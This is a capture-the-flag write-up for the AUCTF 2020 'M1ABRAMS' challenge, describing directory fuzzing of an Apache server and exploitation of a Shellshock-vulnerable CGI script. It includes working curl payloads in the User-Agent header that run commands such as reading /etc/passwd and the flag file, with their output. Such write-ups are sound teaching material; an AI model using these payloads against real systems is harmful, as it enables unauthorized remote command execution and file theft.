[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]


.:: M1ABRAMS - AUCTF 2020 ::.
Title : M1ABRAMS - AUCTF 2020
Author : Cabir  
teammates : Deilyora, Worty
Date : Sunday, Apr 5, 2020
Modified : Sunday, Apr 5, 2020
Reading time: 1 minutes and 57 seconds.

.: DESCRIPTION :.

We built up this server, and our security team seems pretty mad about it. See if you can find out why. Author: shinigami


-=[M1ABRAMS - AUCTF 2020]=-

Let’s go on http://challenges.auctf.com:30024/

center

From here I started fuzzing the URL with dirsearch

center And i found two endpoints :

1403 /cgi-bin/ 
2403 /server-status  

The endpoint /server-status is present all the time on apache servers, and it’s inaccessible to public by default (IP’s whitelist) So I tried fuzzing in /cgi-bin/ with specials CGI-BIN wordlists from SecLists source : https://github.com/danielmiessler/SecLists.git But nothing came up. I inspected Headers on the / page, and I saw the Server responding: Server: Apache/2.4.29 (Ubuntu) Since I had nothing, I start researching CVE on this Apache version. Nothing seems interesting from a CTF POV (DOS), and the few exploits I tried didn’t work. So I started over. I tried fuzzing again in the URL with different wordlists looking for special Apache folder. Nothing… I also tried fuzzing again /cgi-bin/ but this time with the big.txt wordlist from dirb

center

AND YES ! We found something ! /cgi-bin/scriptlet If we go to this endpoint, we see :

center

Snif. Snif. Smells like ShellShock Vulnerability. Look at this if you don’t know what ShellShock Vulnerability is : https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf

First I tried to run a simple payload :

1curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"  http://challenges.auctf.com:30025/cgi-bin/scriptlet  

We have a RCE :

 1root:x:0:0:root:/root:/bin/bash
 2daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 3bin:x:2:2:bin:/bin:/usr/sbin/nologin
 4sys:x:3:3:sys:/dev:/usr/sbin/nologin
 5sync:x:4:65534:sync:/bin:/bin/sync
 6games:x:5:60:games:/usr/games:/usr/sbin/nologin
 7man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 8lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 9mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
10news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
11uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
12proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
13www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
14backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
15list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
16irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
17gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
18nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
19_apt:x:100:65534::/nonexistent:/usr/sbin/nologin 

Now we are trying to read the root folder content :

1curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'ls /'" http://challenges.auctf.com:30025/cgi-bin/scriptlet  

We have :

1bin boot dev etc flag.file home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var  

We can see the flag.file in the root directory, let’s read it

1curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /flag.file'" http://challenges.auctf.com:30025/cgi-bin/scriptlet
2
31f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c93036348c0fce30f08ecf358eaf72484989ace502005a5da5461b000000  

We have hexadecimal values. To export it and avoid loss of data we convert it to base64.

1 curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'base64 /flag.file'"  http://challenges.auctf.com:30025/cgi-bin/scriptlet MWY4YjA4MDhkZTM2NzU1ZTAwMDM2NjZjNjE2NzJlNzQ3ODc0MDA0YjJjNGQyZTQ5YWI1NmM5MzAz NjM0CjhjMGZjZTMwZjA4ZWNmMzU4ZWFmNzI0ODQ5ODlhY2U1MDIwMDVhNWRhNTQ2MWIwMDAwMDAK  

I copy/pasted the flag.file content into a file on my machine. Then I did a reverse decoding to read the hexadecimal data and I redirected it into file.txt

1 cat flag.file | base64 -d | xxd -r -p > file.txt 
2
3file file.txt file.txt: gzip compressed data, was "flag.txt", last modified: Fri Mar 20 21:34:22 2020, from Unix, original size 27  

ok.

we have a gzip file. I try to decompress it.

1gzip -d file.txt 
2gzip: file.txt: unknown suffix -- ignored  

Shit. Wrong file suffix.

1mv file.txt file.gz 
2gzip -d file.gz 
3cat file

.: FLAG :.

auctf{$h311_Sh0K_m3_z@ddY}

[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]